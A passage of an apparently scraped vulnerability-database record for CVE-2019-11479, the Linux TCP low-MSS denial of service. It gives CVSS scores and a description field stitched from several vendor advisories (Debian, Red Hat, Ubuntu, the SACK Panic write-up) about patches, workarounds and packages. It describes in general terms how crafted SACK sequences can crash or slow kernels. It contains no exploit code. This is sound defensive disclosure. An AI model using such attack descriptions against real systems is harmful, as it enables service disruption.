        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-143129",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2019-11479",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "MEDIUM",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "security@ubuntu.com",
            "availabilityImpact": "LOW",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 1.4,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-11479",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "security@ubuntu.com",
            "id": "CVE-2019-11479",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201906-683",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-143129",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-11479",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-143129"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-11479"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-683"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11479"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11479"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Jonathan Looney discovered that the Linux kernel default MSS is hard-coded to 48 bytes. This allows a remote peer to fragment TCP resend queues significantly more than if a larger MSS were enforced. A remote attacker could use this to cause a denial of service. This has been fixed in stable kernel releases 4.4.182, 4.9.182, 4.14.127, 4.19.52, 5.1.11, and is fixed in commits 967c05aee439e6e5d7d805e195b3a20ef5c433d6 and 5f3e2bf008c2221478101ee72f5cb4654b9fc363. Multiple TCP Selective Acknowledgement (SACK) and Maximum Segment Size (MSS) networking vulnerabilities may cause denial-of-service conditions in Linux and FreeBSD kernels. This vulnerability stems from improper management of system resources (such as memory, disk space, files, etc.) by network systems or products. A successful exploit could cause the targeted system to crash, resulting in a DoS condition. \nProof-of-concept (PoC) code that demonstrates an exploit of this vulnerability is publicly available. \nKernel.org has confirmed the vulnerability and released software updates. \n\nBug Fix(es):\n\n* update the MRG 2.5.z 3.10 kernel-rt sources (BZ#1711010)\n\n4. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nCVE-2019-3846, CVE-2019-10126\n\n    huangwen reported multiple buffer overflows in the Marvell wifi\n    (mwifiex) driver, which a local user could use to cause denial of\n    service or the execution of arbitrary code. \n\nCVE-2019-5489\n\n    Daniel Gruss, Erik Kraft, Trishita Tiwari, Michael Schwarz, Ari\n    Trachtenberg, Jason Hennessey, Alex Ionescu, and Anders Fogh\n    discovered that local users could use the mincore() system call to\n    obtain sensitive information from other processes that access the\n    same memory-mapped file. \n\n    This update introduces a new sysctl value to control the minimal MSS\n    (net.ipv4.tcp_min_snd_mss), which by default uses the formerly hard-\n    coded value of 48.  We recommend raising this to 536 unless you know\n    that your network requires a lower value. \n\nCVE-2019-11486\n\n    Jann Horn of Google reported numerous race conditions in the\n    Siemens R3964 line discipline. This module has therefore been\n    disabled. \n\nCVE-2019-11599\n\n    Jann Horn of Google reported a race condition in the core dump\n    implementation which could lead to a use-after-free. \n\nCVE-2019-11815\n\n    It was discovered that a use-after-free in the Reliable Datagram\n    Sockets protocol could result in denial of service and potentially\n    privilege escalation.  This protocol module (rds) is not auto-\n    loaded on Debian systems, so this issue only affects systems where\n    it is explicitly loaded. \n\nCVE-2019-11833\n\n    It was discovered that the ext4 filesystem implementation writes\n    uninitialised data from kernel memory to new extent blocks.  A\n    local user able to write to an ext4 filesystem and then read the\n    filesystem image, for example using a removable drive, might be\n    able to use this to obtain sensitive information. \n\nCVE-2019-11884\n\n    It was discovered that the Bluetooth HIDP implementation did not\n    ensure that new connection names were null-terminated.  A local\n    user with CAP_NET_ADMIN capability might be able to use this to\n    obtain sensitive information from the kernel stack. \n\nFor the detailed security status of linux please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/linux\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAl0H04lfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0Tszw//R1zmUfrItTVMKsH3SlhMG/Nyd1efD/MaYwK/MXHv02BH56G3Th/W1uxh\nMEjyYTs7gE/UNyx6mr90G/BvymKNCqMEk5ooT7+xXcIgfBi+qvQW/YoBSOFi+Gai\n58ofw0En+OQ4Fs1J95XRFjgegBitnsBumMxDcn2adKsbr7s8mKDaesENuXGe7sam\nDa8T6b0akCWK1i85JsQMG3OI661EdjosDHFHJyCVo8L1q3guYG11GPVlT/TI1ErN\n68dVqLWq01Vn5TjKaUr6xeAHDMma+fKaHaitnxhmt06AcH/zQo4wDocQx8DOEWpE\n6xBcCyABkKQ84iTKrFZKcnBDCwHaEcq6UytqIbkXIGpA0jRgaLzCNEOWt9GuENmt\nYoaxXwIi9RSMe8flyrWURGyWLrfJkh/Bk/P6WlpOCMSJmB9uXTnPxjMpfoMNqQjs\nBljbGqeN06dvFAq1fMzlqykbeHzDksHZ4pZizMNYqCNdQs3erm0rdyS55mN60o5/\nSDIur1KokXi60zTwDPne1tyh00EP0liWyvh79u2/kaIazjbtTtoVYlyF5Wm/pu/r\nE46Mpv8pI7YIDNUVrtM/vLznqq+4BcVaqLBIVeMf+XAfqxJ5IrZ4ejaPvlP7hi4+\nNwCQrSCaGk2nwBZr6Xs0qYVTsLLY9jkg8FUWPdH4ZEOFcGaWi3A=dgfy\n-----END PGP SIGNATURE-----\n. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. \n\nBug Fix(es):\n\n* [HPE 8.0 Bug] nvme drive power button does not turn off drive\n(BZ#1700288)\n\n* RHEL8.0 - hw csum failure seen in dmesg and console (using\nmlx5/mlx4/Mellanox) (BZ#1700289)\n\n* RHEL8.0 - vfio-ap: add subsystem to matrix device to avoid libudev\nfailures (kvm) (BZ#1700290)\n\n* [FJ8.1 Bug]: Make Fujitsu Erratum 010001 patch work on A64FX v1r0\n(BZ#1700901)\n\n* [FJ8.0 Bug]: Fujitsu A64FX processor errata - panic by unknown fault\n(BZ#1700902)\n\n* RHEL 8.0 Snapshot 4 - nvme create-ns command hangs after creating 20\nnamespaces on Bolt (NVMe) (BZ#1701140)\n\n* [Cavium/Marvell 8.0 qed] Fix qed_mcp_halt() and qed_mcp_resume()\n(backporting bug) (BZ#1704184)\n\n* [Intel 8.1 Bug] PBF: Base frequency display fix (BZ#1706739)\n\n* [RHEL8]read/write operation not permitted to /sys/kernel/debug/gcov/reset\n(BZ#1708100)\n\n* RHEL8.0 - ISST-LTE:pVM:fleetwood:LPM:raylp85:After lpm seeing the\nconsole logs on the the lpar at  target side (BZ#1708102)\n\n* RHEL8.0 - Backport support for software count cache flush Spectre v2\nmitigation (BZ#1708112)\n\n* [Regression] RHEL8.0 - System crashed with one stress-ng-mremap stressor\non Boston (kvm host) (BZ#1708617)\n\n* [intel ice Rhel 8 RC1] ethtool -A ethx causes interfaces to go down\n(BZ#1709433)\n\n4. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Important: kernel security and bug fix update\nAdvisory ID:       RHSA-2019:1485-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2019:1485\nIssue date:        2019-06-17\nCVE Names:         CVE-2019-11477 CVE-2019-11478 CVE-2019-11479\n====================================================================\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.2\nAdvanced Update Support, Red Hat Enterprise Linux 7.2 Telco Extended Update\nSupport, and Red Hat Enterprise Linux 7.2 Update Services for SAP\nSolutions. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Server AUS (v. 7.2) - noarch, x86_64\nRed Hat Enterprise Linux Server E4S (v. 7.2) - noarch, x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 7.2) - x86_64\nRed Hat Enterprise Linux Server Optional E4S (v. 7.2) - x86_64\nRed Hat Enterprise Linux Server Optional TUS (v. 7.2) - x86_64\nRed Hat Enterprise Linux Server TUS (v. 7.2) - noarch, x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. While processing SACK segments, the Linux kernel\u0027s socket buffer\n(SKB) data structure becomes fragmented. To efficiently process SACK blocks, the Linux\nkernel merges multiple fragmented SKBs into one, potentially overflowing\nthe variable holding the number of segments. A remote attacker could use\nthis flaw to crash the Linux kernel by sending a crafted sequence of SACK\nsegments on a TCP connection with small value of TCP MSS, resulting in a\ndenial of service (DoS). (CVE-2019-11477)\n\n* Kernel: tcp: excessive resource consumption while processing SACK blocks\nallows remote denial of service (CVE-2019-11478)\n\n* Kernel: tcp: excessive resource consumption for TCP connections with low\nMSS allows remote denial of service (CVE-2019-11479)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* THP: Race between MADV_DONTNEED and NUMA hinting node migration code\n(BZ#1698103)\n\n* [RHEL7] md_clear flag missing from /proc/cpuinfo on late microcode update\n(BZ#1712989)\n\n* [RHEL7] MDS mitigations are not enabled after double microcode update\n(BZ#1712994)\n\n* WARNING: CPU: 0 PID: 0 at kernel/jump_label.c:90\n__static_key_slow_dec+0xa6/0xb0 (BZ#1713000)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1719123 - CVE-2019-11477 Kernel: tcp: integer overflow while processing SACK blocks allows remote denial of service\n1719128 - CVE-2019-11478 Kernel: tcp: excessive resource consumption while processing SACK blocks allows remote denial of service\n1719129 - CVE-2019-11479 Kernel: tcp: excessive resource consumption for TCP connections with low MSS allows remote denial of service\n\n6. Package List:\n\nRed Hat Enterprise Linux Server AUS (v. 7.2):\n\nSource:\nkernel-3.10.0-327.79.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-327.79.2.el7.noarch.rpm\nkernel-doc-3.10.0-327.79.2.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debug-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-devel-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-headers-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-tools-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-327.79.2.el7.x86_64.rpm\nperf-3.10.0-327.79.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\npython-perf-3.10.0-327.79.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server E4S (v. 7.2):\n\nSource:\nkernel-3.10.0-327.79.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-327.79.2.el7.noarch.rpm\nkernel-doc-3.10.0-327.79.2.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debug-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-devel-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-headers-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-tools-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-327.79.2.el7.x86_64.rpm\nperf-3.10.0-327.79.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\npython-perf-3.10.0-327.79.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server TUS (v. 7.2):\n\nSource:\nkernel-3.10.0-327.79.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-327.79.2.el7.noarch.rpm\nkernel-doc-3.10.0-327.79.2.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debug-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-devel-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-headers-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-tools-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-327.79.2.el7.x86_64.rpm\nperf-3.10.0-327.79.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\npython-perf-3.10.0-327.79.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 7.2):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-327.79.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional E4S (v. 7.2):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-327.79.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional TUS (v. 7.2):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-327.79.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-11477\nhttps://access.redhat.com/security/cve/CVE-2019-11478\nhttps://access.redhat.com/security/cve/CVE-2019-11479\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/tcpsack\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXQfrL9zjgjWX9erEAQh8Yw//XDYZhLE+6/G5jELh43MDCVjixj/y8u2b\nRaMA/eOCJcq1MXV9k5XDruAeZWoMUcCV3OvBi4NIdQ4GXNb0idp3HvXUbAn6yxjh\nANslnVZO8XTYFEpxdSGJf2DLVS+uwe+bnfgQQ6BTFJCDEfOAHsPv/d+jZF3qe2Hm\nWdD//r+U26C23e6Mz9nu1+k3fyScj+UCYCeIWLikKzboB5TmH1KDH7DS0p71JPKE\n65I6b7W1ucj0SdvTpQH7VUesww+TM7KZHHwgo0Ydqusf+RoVyYbW3jbZGb+5m5aB\ntb8v/zaGsXBthKZmH6LCu02P+0Jbou8vEvqCztuwmqDocAeblm3mzeL8FerKCxCp\nobEEUcjsTbP+RDkNp2qjlfR6V11msl9PzTHXzrQw+7qxZodE9Jhv8Tvm3uTPvbi6\nOTD9ez1Hkw5yaWIJBEitGLMxl4HjHaSXOLwbWkoQcEsv1ENmKtvz6wz64zefxljX\nVBPkLVuLGdwOzOlXHa9Oks3bWiKYUHt36R5sdz+uYL6NTCL5CLv8oUXCN5bYWRlU\nlCA6f5EYCR3Em8VFChAA51f+i688hmxq4sJwNtvoMVG96FwtVgSmmikb8cFN9+C+\nqLlmaaC+b8cZ9COWfw2XAMkrFCYUNt7eL4W/vlZK+GkiYUxEYFZnJAqLXOWFgVpe\nnLvixkiNDOA=rUVR\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. 7) - aarch64, noarch, ppc64le\n\n3. ==========================================================================\nUbuntu Security Notice USN-4041-2\nJune 29, 2019\n\nlinux-lts-xenial, linux-aws, linux-azure update\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel.  Unfortunately,\nthe update introduced a regression that interfered with networking\napplications that setup very low SO_SNDBUF values. This update fixes\nthe problem. \n\nWe apologize for the inconvenience. \n(CVE-2019-11479)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n  linux-image-4.15.0-1049-azure   4.15.0-1049.54~14.04.1\n  linux-image-4.4.0-1048-aws      4.4.0-1048.52\n  linux-image-4.4.0-154-generic   4.4.0-154.181~14.04.1\n  linux-image-4.4.0-154-generic-lpae  4.4.0-154.181~14.04.1\n  linux-image-4.4.0-154-lowlatency  4.4.0-154.181~14.04.1\n  linux-image-4.4.0-154-powerpc-e500mc  4.4.0-154.181~14.04.1\n  linux-image-4.4.0-154-powerpc-smp  4.4.0-154.181~14.04.1\n  linux-image-4.4.0-154-powerpc64-emb  4.4.0-154.181~14.04.1\n  linux-image-4.4.0-154-powerpc64-smp  4.4.0-154.181~14.04.1\n  linux-image-aws                 4.4.0.1048.49\n  linux-image-azure               4.15.0.1049.36\n  linux-image-generic-lpae-lts-xenial  4.4.0.154.135\n  linux-image-generic-lts-xenial  4.4.0.154.135\n  linux-image-lowlatency-lts-xenial  4.4.0.154.135\n  linux-image-powerpc-e500mc-lts-xenial  4.4.0.154.135\n  linux-image-powerpc-smp-lts-xenial  4.4.0.154.135\n  linux-image-powerpc64-emb-lts-xenial  4.4.0.154.135\n  linux-image-powerpc64-smp-lts-xenial  4.4.0.154.135\n  linux-image-virtual-lts-xenial  4.4.0.154.135\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. The most serious, dubbed _\u201cSACK Panic_,\u201d allows a remotely-triggered kernel panic on recent Linux kernels. \n\nThere are patches that address most of these vulnerabilities. If patches can not be applied, certain mitigations will be effective. We recommend that affected parties enact one of those described below, based on their environment. \n\n### Details:\n\n#### 1: [CVE-2019-11477](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11477): SACK Panic (Linux \u003e= 2.6.29)\n\n__Description:__\nA sequence of SACKs may be crafted such that one can trigger an integer overflow, leading to a kernel panic. \n\n__Fix:__ Apply the patch [PATCH_net_1_4.patch](2019-001/PATCH_net_1_4.patch). Additionally, versions of the Linux kernel up to, and including, 4.14 require a second patch [PATCH_net_1a.patch](2019-001/PATCH_net_1a.patch). \n\n__Workaround #1:__ Block connections with a low MSS using one of the supplied [filters](2019-001/block-low-mss/README.md). (The values in the filters are examples. You can apply a higher or lower limit, as appropriate for your environment.) Note that these filters may break legitimate connections which rely on a low MSS. Also, note that this mitigation is only effective if TCP probing is disabled (that is, the `net.ipv4.tcp_mtu_probing` sysctl is set to 0, which appears to be the default value for that sysctl). \n\n__Workaround #2:__ Disable SACK processing (`/proc/sys/net/ipv4/tcp_sack` set to 0). \n\n(Note that either workaround should be sufficient on its own. It is not necessary to apply both workarounds.)\n\n\n### 2: [CVE-2019-11478](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11478): SACK Slowness (Linux \u003c 4.15) or Excess Resource Usage (all Linux versions)\n\n__Description:__ It is possible to send a crafted sequence of SACKs which will fragment the TCP retransmission queue. On Linux kernels prior to 4.15, an attacker may be able to further exploit the fragmented queue to cause an expensive linked-list walk for subsequent SACKs received for that same TCP connection. \n\n__Fix:__ Apply the patch [PATCH_net_2_4.patch](2019-001/PATCH_net_2_4.patch)\n\n__Workaround #1:__ Block connections with a low MSS using one of the supplied [filters](2019-001/block-low-mss/README.md). (The values in the filters are examples. You can apply a higher or lower limit, as appropriate for your environment.) Note that these filters may break legitimate connections which rely on a low MSS. Also, note that this mitigation is only effective if TCP probing is disabled (that is, the `net.ipv4.tcp_mtu_probing` sysctl is set to 0, which appears to be the default value for that sysctl). \n\n__Workaround #2:__ Disable SACK processing (`/proc/sys/net/ipv4/tcp_sack` set to 0). \n\n(Note that either workaround should be sufficient on its own. It is not necessary to apply both workarounds.)\n\n\n### 3: [CVE-2019-5599](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5599): SACK Slowness (FreeBSD 12 using the RACK TCP Stack)\n\n__Description:__ It is possible to send a crafted sequence of SACKs which will fragment the RACK send map. An attacker may be able to further exploit the fragmented send map to cause an expensive linked-list walk for subsequent SACKs received for that same TCP connection. \n\n__Workaround #1:__ Apply the patch [split_limit.patch](2019-001/split_limit.patch) and set the `net.inet.tcp.rack.split_limit` sysctl to a reasonable value to limit the size of the SACK table. \n\n__Workaround #2:__ Temporarily disable the RACK TCP stack. \n\n(Note that either workaround should be sufficient on its own. It is not necessary to apply both workarounds.)\n\n\n### 4: [CVE-2019-11479](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11479): Excess Resource Consumption Due to Low MSS Values (all Linux versions)\n\n__Description:__ An attacker can force the Linux kernel to segment its responses into multiple TCP segments, each of which contains only 8 bytes of data. This drastically increases the bandwidth required to deliver the same amount of data. Further, it consumes additional resources (CPU and NIC processing power). This attack requires continued effort from the attacker and the impacts will end shortly after the attacker stops sending traffic. \n\n__Fix:__ Two patches [PATCH_net_3_4.patch](2019-001/PATCH_net_3_4.patch) and [PATCH_net_4_4.patch](2019-001/PATCH_net_4_4.patch) add a sysctl which enforces a minimum MSS, set by the `net.ipv4.tcp_min_snd_mss` sysctl. This lets an administrator enforce a minimum MSS appropriate for their applications. \n\n__Workaround:__ Block connections with a low MSS using one of the supplied [filters](2019-001/block-low-mss/README.md). (The values in the filters are examples. You can apply a higher or lower limit, as appropriate for your environment.) Note that these filters may break legitimate connections which rely on a low MSS. Also, note that this mitigation is only effective if TCP probing is disabled (that is, the `net.ipv4.tcp_mtu_probing` sysctl is set to 0, which appears to be the default value for that sysctl). \n\n\n### Note:\nGood system and application coding and configuration practices (limiting write buffers to the necessary level, monitoring connection memory consumption via SO_MEMINFO, and aggressively closing misbehaving connections) can help to limit the impact of attacks against these kinds of vulnerabilities. \n\n\n## Acknowledgments:\nOriginally reported by Jonathan Looney. \n\nWe thank Eric Dumazet for providing Linux fixes and support. \n\nWe thank Bruce Curtis for providing the Linux filters. \n\nWe thank Jonathan Lemon and Alexey Kodanev for helping to improve the Linux patches. \n\nWe gratefully acknowledge the assistance of Tyler Hicks in testing fixes, refining the information about vulnerable versions, and providing assistance during the disclosure process. 6.6) - x86_64\n\n3. \n\nBug Fix(es):\n\n* MDS mitigations not enabled on Intel Skylake CPUs (BZ#1713026)\n\n* [RHEL6] md_clear flag missing from /proc/cpuinfo (BZ#1713029)\n\n* RHEL6 kernel does not disable SMT with mds=full,nosmt (BZ#1713044)\n\n4",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-11479"
      },
      {
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "db": "VULHUB",
        "id": "VHN-143129"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-11479"
      },
      {
        "db": "PACKETSTORM",
        "id": "153323"
      },
      {
        "db": "PACKETSTORM",
        "id": "153477"
      },
      {
        "db": "PACKETSTORM",
        "id": "153326"
      },
      {
        "db": "PACKETSTORM",
        "id": "153324"
      },
      {
        "db": "PACKETSTORM",
        "id": "153337"
      },
      {
